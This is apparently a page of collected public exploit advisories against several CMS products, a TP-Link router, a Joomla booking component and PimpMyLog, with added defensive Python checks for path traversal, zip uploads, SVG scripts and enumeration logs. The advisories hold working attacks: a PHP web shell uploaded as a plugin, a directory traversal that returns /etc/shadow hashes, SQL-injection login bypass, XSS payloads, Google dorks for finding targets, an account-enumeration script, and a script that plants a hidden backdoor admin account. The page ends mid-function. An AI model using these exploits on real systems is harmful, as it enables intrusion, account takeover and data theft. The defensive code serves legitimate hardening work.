<pre><code>====================================================================================================================================<br />| # Title : CMS porViaX v2.0 SQL Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0.1(32-bit) | <br />| # Vendor : https://codecanyon.net/ | <br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Use payload : noticias?pg=\<br /><br />[+] http://127.0.0.1/muritiba.ba.govbr/noticias?pg=%5c <==== inject here<br /><br />[+] Login http://127.0.0.1/muritiba.ba.govbr/admin/<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: TP-Link TL-WR740N - Authenticated Directory Traversal<br /># Date: 13/7/2023<br /># Exploit Author: Anish Feroz (Zeroxinn)<br /># Vendor Homepage: http://www.tp-link.com<br /># Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n<br /># Tested on: TP-Link TL-WR740N<br /><br />---------------------------POC---------------------------<br /><br />Request<br />-------<br /><br />GET /help/../../../etc/shadow HTTP/1.1<br />Host: 192.168.0.1:8082<br />Authorization: Basic YWRtaW46YWRtaW4=<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />Response<br />--------<br /><br />HTTP/1.1 200 OK<br />Server: Router Webserver<br />Connection: close<br />WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N"<br />Content-Type: text/html<br /><br /><META http-equiv=Content-Type content="text/html; charset=iso-8859-1"><br /><HTML><br /><HEAD><TITLE>TL-WR740N</TITLE><br /><META http-equiv=Pragma content=no-cache><br /><META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT"><br /><LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css"><br /><SCRIPT language="javascript" type="text/javascript"><!--<br />if(window.parent == window){window.location.href="http://192.168.0.1";}<br />function Click(){ return false;}<br />document.oncontextmenu=Click;<br />function doPrev(){history.go(-1);}<br />//--></SCRIPT><br />root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::<br />Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::<br />bin::10933:0:99999:7:::<br />daemon::10933:0:99999:7:::<br />adm::10933:0:99999:7:::<br />lp:*:10933:0:99999:7:::<br />sync:*:10933:0:99999:7:::<br />shutdown:*:10933:0:99999:7:::<br />halt:*:10933:0:99999:7:::<br />uucp:*:10933:0:99999:7:::<br />operator:*:10933:0:99999:7:::<br />nobody::10933:0:99999:7:::<br />ap71::10933:0:99999:7:::<br /><br /></code></pre>
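The traversal above works because the help-page handler joins the request path onto its document root without canonicalising it first. The check below is an editor's example, not code from the advisory or from TP-Link firmware: it decodes the path once, collapses `.` and `..` segments, and refuses anything that no longer sits under the root. The `/www` document root and the `check_request_line` helper are assumptions for the demo.

```python
import posixpath
from urllib.parse import unquote

# Assumed document root for the demo; the real firmware path is not known from the advisory.
WEB_ROOT = "/www"


def resolve_static_path(web_root, request_path):
    """Map a URL path onto a filesystem path under web_root.

    Returns the resolved path, or None when the request must be refused:
    the query string is dropped, percent-encoding is decoded once, NUL bytes
    are rejected, backslashes are treated as separators, '.' and '..' are
    collapsed with posixpath.normpath, and the result must still start with
    web_root. Checking the *resolved* path is what defeats '/help/../../..'.
    """
    path = request_path.split("?", 1)[0]
    decoded = unquote(path)
    if "\x00" in decoded:
        return None                       # NUL truncates paths in C string APIs
    decoded = decoded.replace("\\", "/")  # '..\\' must not slip past the check
    relative = decoded.lstrip("/")        # keep the join relative to the root
    root = posixpath.normpath(web_root)
    candidate = posixpath.normpath(posixpath.join(root, relative))
    if candidate != root and not candidate.startswith(root + "/"):
        return None                       # resolved outside the document root
    return candidate


def check_request_line(request_line, web_root=WEB_ROOT):
    """Apply the guard to a raw HTTP request line such as 'GET /help/x HTTP/1.1'."""
    parts = request_line.split()
    if len(parts) != 3:
        return None
    return resolve_static_path(web_root, parts[1])


if __name__ == "__main__":
    # The request from the advisory resolves to /etc/shadow and is refused (None).
    for line in ("GET /help/../../../etc/shadow HTTP/1.1",
                 "GET /help/%2e%2e/%2e%2e/%2e%2e/etc/shadow HTTP/1.1",
                 "GET /help/index.htm HTTP/1.1"):
        print(line, "->", check_request_line(line))
```

Note that the comparison is against the normalised result, not against the presence of `..` in the raw string: encoded, doubled or backslash variants all collapse to the same resolved path and are caught by the one prefix test.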
<pre><code>## Title: pluck-4.7.18 - FI + RCE.<br />## Author: nu11secur1ty<br />## Date: 07.19.2023<br />## Vendor: https://github.com/pluck-cms/pluck/wiki<br />## Software: https://github.com/pluck-cms/pluck<br />## Reference: https://portswigger.net/daily-swig/rce<br />## Reference: https://portswigger.net/web-security/file-upload<br /><br /><br />## Description:<br />An attacker who already has an account can upload a fake module to<br />the system and execute the content of this module on the server.<br />In this example, the attacker executes an info file from the<br />uploaded fake module and obtains all information about the system.<br />This is a CRITICAL vulnerability.<br />The problem is that the developers do not implement a strong<br />sanitizing upload function and do not restrict execution from<br />inside the server.<br /><br />## Status: HIGH Vulnerability<br /><br />[+]Exploit: prostak.php<br /><br />- - - NOTE: The attacker can also upload an EXE file, which he<br />can then execute or download!<br /><br />```php<br /><?php<br />// by nu11secur1ty - 2023<br /> phpinfo();<br />?><br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/pluck/2023/pluck-4.7.18)<br /><br />## Proof and Exploit<br />[href](https://www.nu11secur1ty.com/2023/07/pluck-4718-fi-rce.html)<br /><br />## Time spent:<br />00:35:00<br /><br /><br /></code></pre>
<pre><code>Exploit Title: Blackcat Cms v1.4 - Remote Code Execution (RCE)<br />Application: blackcat Cms<br />Version: v1.4<br />Bugs: RCE<br />Technology: PHP<br />Vendor URL: https://blackcat-cms.org/<br />Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS<br />Date found: 13.07.2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br />Steps: <br />1. Log in to an account as admin<br />2. Go to admin-tools => jquery plugin (http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr)<br />3. Upload a zip file; this zip file must contain poc.php <br />poc.php file contents: <br /><?php $a=$_GET['code']; echo system($a);?><br />4. Go to http://localhost/BlackCatCMS-1.4/upload/modules/lib_jquery/plugins/poc/poc.php?code=cat%20/etc/passwd<br /><br />PoC request<br /><br />POST /BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr HTTP/1.1<br />Host: localhost<br />Content-Length: 577<br />Cache-Control: max-age=0<br />sec-ch-ua: <br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: ""<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBRByJwW3CUSHOcBT<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: cat7288sessionid=7uv7f4kj7hm9q6jnd6m9luq0ti<br />Connection: close<br /><br />------WebKitFormBoundaryBRByJwW3CUSHOcBT<br />Content-Disposition: form-data; name="upload"<br /><br />1<br />------WebKitFormBoundaryBRByJwW3CUSHOcBT<br />Content-Disposition: form-data; name="userfile"; filename="poc.zip"<br />Content-Type: application/zip<br /><br />PKvalsdalsfapoc.php<?php <br />$a=$_GET['code']; <br />echo system($a);<br />?><br />blabalaboalpoc.php<br />blablabla<br />------WebKitFormBoundaryBRByJwW3CUSHOcBT<br />Content-Disposition: form-data; name="submit"<br /><br />Upload<br />------WebKitFormBoundaryBRByJwW3CUSHOcBT--<br /><br /><br /></code></pre>
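Steps 3 and 4 succeed because the jQuery plugin manager extracts whatever the archive contains into a directory the web server both serves and executes. The inspection below is an added example, not BlackCat CMS code: it opens the upload in memory and rejects it when a member is not a file type a jQuery plugin needs, when a member name would escape the extraction directory, when a member is a symlink, or when the archive is oversized. The extension allow-list, the limits and the `build_zip` helper that constructs the sample archives are assumptions for the demo.

```python
import io
import posixpath
import stat
import zipfile

# Assumed allow-list of what a jQuery plugin legitimately ships; anything else is refused,
# which covers .php as well as .phtml, .phar and every other server-side extension.
ALLOWED_EXTENSIONS = {".js", ".css", ".png", ".jpg", ".jpeg", ".gif", ".map", ".json", ".md", ".txt"}


def inspect_plugin_zip(data, max_members=500, max_uncompressed=20 * 1024 * 1024):
    """Return the list of reasons to reject the archive; an empty list means it passed."""
    reasons = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ["not a valid zip archive"]
    with zf:
        infos = zf.infolist()
        if len(infos) > max_members:
            reasons.append("too many members (%d)" % len(infos))
        total = sum(info.file_size for info in infos)
        if total > max_uncompressed:
            reasons.append("uncompressed size %d exceeds limit" % total)
        for info in infos:
            name = info.filename
            norm = posixpath.normpath(name.replace("\\", "/"))
            if name.startswith("/") or norm == ".." or norm.startswith("../"):
                reasons.append("path escapes extraction directory: %r" % name)
            # Unix mode bits live in the high 16 bits of external_attr.
            if stat.S_ISLNK(info.external_attr >> 16):
                reasons.append("symbolic link in archive: %r" % name)
            if info.is_dir():
                continue
            ext = posixpath.splitext(norm)[1].lower()
            if ext not in ALLOWED_EXTENSIONS:
                reasons.append("file type not allowed in a jQuery plugin: %r" % name)
    return reasons


def build_zip(members):
    """Constructed helper for the demo: build an in-memory zip from {name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed samples: a plugin carrying a PHP file (the shape used in the advisory),
# a clean plugin, and one whose member name climbs out of the plugin directory.
MALICIOUS_PLUGIN = build_zip({"poc/poc.php": b"<?php phpinfo(); ?>"})
BENIGN_PLUGIN = build_zip({"slider/jquery.slider.js": b"(function ($) {})(jQuery);",
                           "slider/slider.css": b".slider { display: block; }"})
TRAVERSAL_PLUGIN = build_zip({"../../index.js": b"// would land two levels above the plugin dir"})

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_PLUGIN), ("benign", BENIGN_PLUGIN),
                        ("traversal", TRAVERSAL_PLUGIN)):
        print(label, "->", inspect_plugin_zip(blob) or "accepted")
```

Inspecting the archive is only half of the fix: the plugin directory should also be served with script execution disabled, so that a file which slips past the inspection is delivered as static content rather than run.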
<pre><code>#Exploit Title: Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)<br />#Application: Backdrop Cms<br />#Version: v1.25.1<br />#Bugs: Stored Xss<br />#Technology: PHP<br />#Vendor URL: https://backdropcms.org/<br />#Software Link: https://github.com/backdrop/backdrop/releases/download/1.25.1/backdrop.zip<br />#Date found: 12-07-2023<br />#Author: Mirabbas Ağalarov<br />#Tested on: Linux <br /><br />2. Technical Details & POC<br />========================================<br /><br />1. Log in to the account<br />2. Go to http://localhost/backdrop/?q=admin/config/system/site-information<br />3. Upload an SVG file<br /><br />"""<br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert(document.location);<br /> </script><br /></svg><br />"""<br />4. Go to the SVG file (http://localhost/backdrop/files/malas_2.svg)<br /><br /><br />Request<br /><br />POST /backdrop/?q=admin/config/system/site-information HTTP/1.1<br />Host: localhost<br />Content-Length: 2116<br />Cache-Control: max-age=0<br />sec-ch-ua: <br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: ""<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVXWRsHHM3TVjALpg<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/backdrop/?q=admin/config/system/site-information<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: SESS31b3aee8377692ae3f36f0cf7fe0e752=ZuJtSS2iu5SvcKAFtpK8zPAxrnmFebJ1q26hXhAh__E<br />Connection: close<br /><br />------WebKitFormBoundaryVXWRsHHM3TVjALpg<br />Content-Disposition: form-data; name="site_name"<br /><br />My Backdrop Site<br />------WebKitFormBoundaryVXWRsHHM3TVjALpg<br />Content-Disposition: form-data; name="site_slogan"<br /><br /><br />------WebKitFormBoundaryVXWRsHHM3TVjALpg<br />Content-Disposition: form-data; name="site_mail"<br /><br />admin@admin.com<br />------WebKitFormBoundaryVXWRsHHM3TVjALpg<br />Content-Disposition: form-data; name="files[site_logo_upload]"; filename="malas.svg"<br />Content-Type: image/svg+xml<br /><br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert(document.location);<br /> </script><br /></svg><br /><br />------WebKitFormBoundaryVXWRsHHM3TVjALpg<br />Content-Disposition: form-data; name="site_logo_path"<br /><br /><br />------WebKitFormBoundaryVXWRsHHM3TVjALpg<br />Content-Disposition: form-data; name="files[site_favicon_upload]"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundaryVXWRsHHM3TVjALpg<br />Content-Disposition: form-data; name="site_favicon_path"<br /><br />core/misc/favicon.ico<br />------WebKitFormBoundaryVXWRsHHM3TVjALpg<br />Content-Disposition: form-data; name="site_frontpage"<br /><br />home<br />------WebKitFormBoundaryVXWRsHHM3TVjALpg<br />Content-Disposition: form-data; name="site_403"<br /><br /><br />------WebKitFormBoundaryVXWRsHHM3TVjALpg<br />Content-Disposition: form-data; name="site_404"<br /><br /><br />------WebKitFormBoundaryVXWRsHHM3TVjALpg<br />Content-Disposition: form-data; name="form_build_id"<br /><br />form-PnR6AFEKCB5hAWH3pDT2J0kkZswH0Rdm0qbOFGqNj-Q<br />------WebKitFormBoundaryVXWRsHHM3TVjALpg<br />Content-Disposition: form-data; name="form_token"<br /><br />siOWtyEEFVg7neDMTYPHVZ2D3D5U60S38l_cRHbnW40<br />------WebKitFormBoundaryVXWRsHHM3TVjALpg<br />Content-Disposition: form-data; name="form_id"<br /><br />system_site_information_settings<br />------WebKitFormBoundaryVXWRsHHM3TVjALpg<br />Content-Disposition: form-data; name="op"<br /><br />Save configuration<br />------WebKitForm<br /><br /></code></pre>
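An SVG is an XML document, so a logo upload can carry a `<script>` element, `on*` event handlers or `javascript:` links and will run them when the file is opened directly from `/files/`, as step 4 shows. The check below is an added example, not Backdrop code: it parses the upload with the standard library and refuses it when any active construct is present, using the advisory's SVG as the constructed malicious sample. The element deny-list, the size cap and the function names are assumptions for the demo; the XML declaration and DOCTYPE in the sample are parsed but the external DTD is not fetched.

```python
import xml.etree.ElementTree as ET

# Constructed sample: the SVG body from the advisory above, a polygon plus a <script>.
MALICIOUS_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
 <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
 <script type="text/javascript">
 alert(document.location);
 </script>
</svg>"""

# Constructed sample: a logo with no active content.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 50 50">
 <polygon points="0,0 0,50 50,0" fill="#009900"/>
</svg>"""

# Assumed deny-list of SVG elements that execute or load active content.
ACTIVE_ELEMENTS = {"script", "handler", "foreignObject", "iframe", "embed", "object"}


def local_name(qualified):
    """Strip the {namespace} prefix ElementTree puts on element and attribute names."""
    return qualified.rsplit("}", 1)[-1]


def svg_active_content(data, max_bytes=256 * 1024):
    """Return the reasons an uploaded SVG must be refused; an empty list means it is clean."""
    if len(data) > max_bytes:
        return ["file exceeds %d bytes" % max_bytes]
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return ["not well-formed XML: %s" % exc]
    if local_name(root.tag) != "svg":
        return ["root element is not <svg>"]
    reasons = []
    for elem in root.iter():              # walks the root and every descendant
        name = local_name(elem.tag)
        if name in ACTIVE_ELEMENTS:
            reasons.append("active element <%s>" % name)
        for attr, value in elem.attrib.items():
            aname = local_name(attr)       # handles xlink:href as well as plain href
            if aname.lower().startswith("on"):
                reasons.append("event handler attribute %s on <%s>" % (aname, name))
            elif aname == "href" and value.strip().lower().startswith("javascript:"):
                reasons.append("javascript: URL in href on <%s>" % name)
    return reasons


def accept_logo_upload(data):
    """Gate for the site-logo upload: only a clean SVG gets through."""
    return not svg_active_content(data)


if __name__ == "__main__":
    print("advisory sample:", svg_active_content(MALICIOUS_SVG))
    print("benign sample:  ", svg_active_content(BENIGN_SVG) or "clean")
```

A deny-list like this catches the advisory's payload and the common variants, but the stronger design is to rasterise uploaded SVGs or rebuild them from an allow-list of safe elements, and to serve anything under `/files/` with `Content-Disposition: attachment` and a restrictive `Content-Security-Policy` so that a file which does slip through cannot run in the site's origin.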
<pre><code># Exploit Title: Joomla! com_booking component 2.4.9 - Information Leak (Account enumeration)<br /># Google Dork: inurl:"index.php?option=com_booking"<br /># Date: 07/12/2023<br /># Exploit Author: qw3rTyTy<br /># Vendor Homepage: http://www.artio.net/<br /># Software Link: http://www.artio.net/downloads/joomla/book-it/book-it-2-free/download<br /># Version: 2.4.9<br /># Tested on: Slackware/Nginx/Joomla! 3.10.11<br />#<br />##<br /># File: site/booking.php<br />#<br /># <?php<br /># [...]<br />#18 include_once (JPATH_COMPONENT_ADMINISTRATOR . DS . 'booking.php');<br /># [...]<br />#<br /># File: admin/booking.php<br />#<br /># <?php<br /># [...]<br />#104 if (class_exists(($classname = AImporter::controller()))) {<br />#105     $controller = new $classname();<br />#106     /* @var $controller JController */<br />#107     $controller->execute(JRequest::getVar('task'));<br />#108     $controller->redirect();<br />#109 }<br /># [...]<br />#<br /># File: admin/controllers/customer.php<br />#<br /># <?php<br /># [...]<br />#240 function getUserData() {<br />#241     $user = JFactory::getUser(JRequest::getInt('id'));<br />#242     $data = array('name' => $user->name, 'username' => $user->username, 'email' => $user->email);<br />#243     die(json_encode($data));<br />#244 }<br /># [...]<br />#<br /># The following GET request is equivalent to a query like 'SELECT name, username, email FROM abcde_users WHERE id=123'.<br />#<br /># curl -X GET http://target/joomla/index.php?option=com_booking&controller=customer&task=getUserData&id=123<br />#<br /># So, an attacker can easily enumerate all accounts by brute-forcing.<br />#<br />##<br />import argparse<br />import urllib.parse<br />import requests<br />from sys import exit<br />from time import sleep<br /><br />def enumerateAccounts(options):<br />    i = 1<br />    url = options.url<br />    url = url + "/index.php?option=com_booking&controller=customer&task=getUserData&id="<br /><br />    while True:<br />        try:<br />            response = requests.get("{}{}".format(url, str(i)))<br /><br />            if response.status_code == 200:<br />                try:<br />                    jsondocument = response.json()<br />                    if jsondocument["name"] != None:<br />                        print(jsondocument)<br />                except requests.exceptions.JSONDecodeError:<br />                    raise<br />            else:<br />                break<br />        except Exception as ex:<br />            print(ex)<br />            break<br /><br />        i += 1<br /><br />def main():<br />    p = argparse.ArgumentParser()<br />    p.add_argument("-u", "--url", type=str, required=True)<br />    parsed = p.parse_args()<br /><br />    try:<br />        t = urllib.parse.urlparse(parsed.url)<br />    except ValueError as ex:<br />        print(ex)<br />        exit()<br /><br />    if not t[0].startswith("http") and not t[0].startswith("https"):<br />        print("Improper URL given.")<br />        exit()<br /><br />    if len(t[1]) == 0:<br />        print("Improper URL given.")<br />        exit()<br /><br />    enumerateAccounts(parsed)<br /><br />if __name__ == "__main__":<br />    main()<br /></code></pre>
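The script above walks `id` upward and keeps every 200 response, which on the server side leaves a distinctive trail: one client, many `task=getUserData` requests, each with a different `id`. The detector below is an added example, not part of the advisory or of the component: it parses access-log lines in combined log format, keeps only successful `com_booking`/`getUserData` lookups, and reports clients that pulled more distinct user ids than a threshold. The log lines are constructed for the demo and the threshold is an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlparse

# Constructed sample access log (combined format): the first client walks id=1..6 with a
# scripting user agent, the second makes one ordinary lookup and one unrelated request.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Jul/2023:10:00:01 +0000] "GET /joomla/index.php?option=com_booking&controller=customer&task=getUserData&id=1 HTTP/1.1" 200 84 "-" "python-requests/2.31.0"
203.0.113.7 - - [12/Jul/2023:10:00:01 +0000] "GET /joomla/index.php?option=com_booking&controller=customer&task=getUserData&id=2 HTTP/1.1" 200 88 "-" "python-requests/2.31.0"
203.0.113.7 - - [12/Jul/2023:10:00:02 +0000] "GET /joomla/index.php?option=com_booking&controller=customer&task=getUserData&id=3 HTTP/1.1" 200 91 "-" "python-requests/2.31.0"
203.0.113.7 - - [12/Jul/2023:10:00:02 +0000] "GET /joomla/index.php?option=com_booking&controller=customer&task=getUserData&id=4 HTTP/1.1" 200 79 "-" "python-requests/2.31.0"
203.0.113.7 - - [12/Jul/2023:10:00:03 +0000] "GET /joomla/index.php?option=com_booking&controller=customer&task=getUserData&id=5 HTTP/1.1" 200 86 "-" "python-requests/2.31.0"
203.0.113.7 - - [12/Jul/2023:10:00:03 +0000] "GET /joomla/index.php?option=com_booking&controller=customer&task=getUserData&id=6 HTTP/1.1" 200 90 "-" "python-requests/2.31.0"
198.51.100.4 - - [12/Jul/2023:10:00:05 +0000] "GET /joomla/index.php?option=com_booking&controller=customer&task=getUserData&id=42 HTTP/1.1" 200 90 "-" "Mozilla/5.0"
198.51.100.4 - - [12/Jul/2023:10:00:09 +0000] "GET /joomla/index.php?option=com_booking&view=bookings HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Pull client IP, status and the com_booking query parameters out of one log line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    qs = parse_qs(urlparse(m.group("target")).query)

    def first(key):
        return qs.get(key, [None])[0]

    return {"ip": m.group("ip"), "status": int(m.group("status")),
            "option": first("option"), "task": first("task"), "id": first("id")}


def detect_enumeration(log_text, threshold=5):
    """Map each client that pulled at least `threshold` distinct user records through
    task=getUserData to the sorted list of ids it requested."""
    ids_by_ip = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["status"] != 200:
            continue
        if (rec["option"] == "com_booking" and rec["task"] == "getUserData"
                and rec["id"] is not None and rec["id"].isdigit()):
            ids_by_ip[rec["ip"]].add(int(rec["id"]))
    return {ip: sorted(ids) for ip, ids in ids_by_ip.items() if len(ids) >= threshold}


if __name__ == "__main__":
    for ip, ids in detect_enumeration(SAMPLE_LOG).items():
        print("%s requested %d distinct user records: %s" % (ip, len(ids), ids))
```

Counting distinct ids rather than raw requests keeps a legitimate user who reloads one booking page from tripping the rule, while a sequential walk is flagged after a handful of records; in a real pipeline the threshold would be applied per time window and the `getUserData` task itself would be gated behind an authorisation check.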
<pre><code>====================================================================================================================================<br />| # Title : CMS EngePlus v2.0.1 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) | <br />| # Vendor : https://codecanyon.net/ | <br />| # Dork : intext:Desenvolvido por EngePlus site:br |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Use Payload : /conteudo.php?int=noticia&codigo_not=8'<script>alert(/indoushka/);</script><br /><br />[+] http://127.0.0.1/rebemilcombr/conteudo.php?int=noticia&codigo_not=8%27%3Cscript%3Ealert(/indoushka/);%3C/script%3E<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: PimpMyLog v1.7.14 - Improper access control<br /># Date: 2023-07-10<br /># Exploit Author: thoughtfault<br /># Vendor Homepage: https://www.pimpmylog.com/<br /># Software Link: https://github.com/potsky/PimpMyLog<br /># Version: 1.5.2-1.7.14<br /># Tested on: Ubuntu 22.04<br /># CVE : N/A<br /># Description: PimpMyLog suffers from improper access control on the account creation endpoint, allowing a remote attacker to create an admin account without any existing permissions. The username is not sanitized and can be leveraged as a vector for stored XSS, which allows the attacker to hide the presence of the backdoor account from legitimate admins. Depending on the existing configuration, an attacker may be able to view sensitive information in Apache, IIS, nginx, and/or PHP logs. The attacker can also view server-side environment variables through the debug feature, which may include passwords or API keys.<br />import requests<br />import argparse<br />from base64 import b64encode<br /><br />js = """var table = document.getElementById("userlisttable");<br />var rows = table.getElementsByTagName("tr");<br />for (var i = 0; i < rows.length; i++) {<br />    var cells = rows[i].getElementsByTagName("td");<br />    for (var j = 0; j < cells.length; j++) {<br />        var anchors = cells[j].getElementsByTagName("a");<br />        for (var k = 0; k < anchors.length; k++) {<br />            if (<br />                anchors[k].innerText === "{}" ||<br />                anchors[k].innerText.includes("atob(") ||<br />                anchors[k].querySelector("script") !== null<br />            ) {<br />                rows[i].parentNode.removeChild(rows[i]);<br />            }<br />        }<br />    }<br />}<br />var userCountElement = document.querySelector('.lead');<br />var userCountText = userCountElement.textContent;<br />var userCount = parseInt(userCountText);<br />if(!isNaN(userCount)){<br />    userCount--;<br />    userCountElement.textContent = userCount + ' Users';<br />}"""<br /><br />payload = "<script>eval(atob('{}'));</script>"<br /><br /><br />def backdoor(url, username, password):<br />    config_url = url + '/inc/configure.php'<br /><br />    print("[*] Creating admin account...")<br />    r = requests.post(config_url, data={'s':'authsave', 'u': username, 'p': password})<br />    if r.status_code != 200:<br />        print("[!] An error occurred")<br />        return<br /><br />    print("[*] Hiding admin account...")<br />    base64_js = b64encode(js.format(username).encode()).decode()<br />    xss_payload = payload.format(base64_js)<br /><br />    r = requests.post(config_url, data={'s':'authsave', 'u': xss_payload, 'p': password})<br />    if r.status_code != 200:<br />        print("[!] An error occurred")<br />        return<br /><br /><br />    print("[*] Exploit finished!")<br /><br />parser = argparse.ArgumentParser()<br />parser.add_argument('--url', help='The base url of the target', required=True)<br />parser.add_argument('--username', default='backdoor', help='The username of the backdoor account')<br />parser.add_argument('--password', default='backdoor', help='The password of the backdoor account')<br />args = parser.parse_args()<br /><br />backdoor(args.url.rstrip('/'), args.username, args.password)<br /></code></pre>
<pre><code>======================================================================================================================================<br />| # Title : CMS D-Creations v1.0 Auth Bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : https://codecanyon.net/ | <br />======================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking in Google or other search engines <br /><br />[+] Use admin : admin'-- - & pass : P@cK3t<br /><br />[+] panel : http://127.0.0.1/cetithkorg/Dashboard.php<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
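The credential pair in this advisory is not a password but an injection: the quote closes the username literal and `-- -` turns the rest of the statement, password check included, into a comment, so a string-built `WHERE username = '...' AND password = '...'` query returns the admin row whatever the password. The backslash probe in the porViaX advisory earlier on this page relies on the same defect, a value spliced into SQL text. The snippet below is an added example, not code from either CMS: it runs the payload against a string-built login query and against a parameterised one on an in-memory SQLite table, with a toy hash standing in for a real password KDF.

```python
import hashlib
import hmac
import sqlite3


def hash_pw(password):
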